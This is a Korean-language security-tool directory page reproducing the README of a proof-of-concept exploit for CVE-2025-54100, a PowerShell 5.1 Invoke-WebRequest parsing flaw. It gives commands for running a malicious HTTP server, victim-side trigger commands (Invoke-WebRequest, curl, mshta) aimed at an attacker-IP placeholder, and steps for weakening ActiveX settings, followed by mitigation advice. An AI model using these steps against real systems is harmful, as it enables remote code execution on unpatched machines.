Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 High)은 Windows PowerShell 5.1의 Invoke-WebRequest cmdlet에서 발생하는 명령 주입 취약점입니다. 이는 웹 응답을 자동으로 구문 분석하는 동안 특수 요소를 부적절하게 중화함으로써 발생합니다. | Kitploit
도구/GitHubGitHub/themehackers/cve-2025-54100
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 High)은 Windows PowerShell 5.1의 Invoke-WebRequest cmdlet에서 발생하는 명령 주입 취약점입니다. 이는 웹 응답을 자동으로 구문 분석하는 동안 특수 요소를 부적절하게 중화함으로써 발생합니다.

저장소 보기
31749개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-54100 – PowerShell 응답 파싱 PoC

악의적인 HTML 파싱을 통해 CVE-2025-54100이 Windows PowerShell 5.1에서 원격 코드 실행(RCE)으로 이어질 수 있음을 보여주는 간결한 개념 증명(PoC)입니다.

목차

  • CVE-2025-54100이란?
  • PoC 작동 방식
  • 빠른 시작
  • 피해자 호스트에서 트리거
  • 문제 해결 및 검증
  • 증거
  • 완화
  • 면책 조항
  • 참고 자료

CVE-2025-54100이란?

  • 유형: -UseBasicParsing을 사용하지 않을 때 Invoke-WebRequest에서 발생하는 명령 삽입
  • 심각도: CVSS 7.8 (높음)
  • 근본 원인: HTML 응답의 MSHTML 기반 파싱으로 인해 호출자의 컨텍스트에서 스크립트 실행(예: ActiveXObject)이 가능함.
  • 영향: PowerShell 5.1을 실행하는 Windows 10/11 및 Windows Server 2008-2025.

PoC 작동 방식

  1. CVE-2025-54100.py의 FastAPI 서버가 조작된 HTML 페이로드를 제공합니다.
  2. 페이로드는 WScript.Shell / Shell.Application ActiveX 개체를 인스턴스화하려고 시도합니다.
  3. 취약한 호스트에서는 MSHTML 파서가 스크립트를 실행하여 calc.exe를 실행함으로써 RCE를 입증합니다.
  4. 제공된 페이로드는 의도적으로 최소화되어 있으며 파괴적이지 않지만 추가 연구를 위해 수정할 수 있습니다.

빠른 시작

전제 조건

  • Python 3.10+ (FastAPI & Uvicorn으로 테스트됨)
  • 종속성 설치:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

악성 서버 실행

PoC HTTP 서버를 시작합니다:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

피해자 호스트에서 트리거

-UseBasicParsing 없이 취약한 Windows 머신에서 다음을 실행합니다:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888

서버에 구성한 것과 동일한 포트를 사용하십시오. 취약한 경우 포함된 스크립트가 MSHTML 파서를 통해 실행됩니다. 일부 AV 제품은 파싱 문제가 있음에도 이 동작을 차단할 수 있습니다.

문제 해결 및 검증

calc.exe가 나타나지 않는 경우:

  1. 피해자 시스템에서 인터넷 옵션을 엽니다.
  2. 보안 → 사용자 지정 수준... 으로 이동합니다.
  3. **"스크립트에 안전하지 않은 것으로 표시된 ActiveX 컨트롤 초기화 및 스크립팅."**을 사용하도록 설정합니다.
  4. -UseBasicParsing 없이 Invoke-WebRequest를 다시 실행합니다.

이는 실행 벡터를 입증합니다. 실제 환경의 페이로드는 기본 제한을 우회하기 위해 난독화 또는 추가 우회 기법을 사용할 수 있습니다.

증거

PoC

완화

Microsoft는 2025년 12월에 이 문제를 패치했습니다:

  1. 영향을 받는 Windows 호스트에 보안 업데이트를 적용합니다.
  2. MSHTML 파싱을 방지하려면 -UseBasicParsing을 사용합니다:
    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. 파싱에 MSHTML을 사용하지 않는 PowerShell 7 이상(pwsh)으로 전환합니다.

면책 조항

[!WARNING] 교육 및 승인된 테스트 목적으로만 사용하십시오. 책임감 있게 사용하고 모든 관련 법률을 준수하십시오. 작성자는 오용 또는 손해에 대해 책임을 지지 않습니다.

참고 자료

  • NVD: CVE-2025-54100
  • MSRC: 업데이트 가이드
  • GitHub: osman1337-security/CVE-2025-54100
도구 다운로드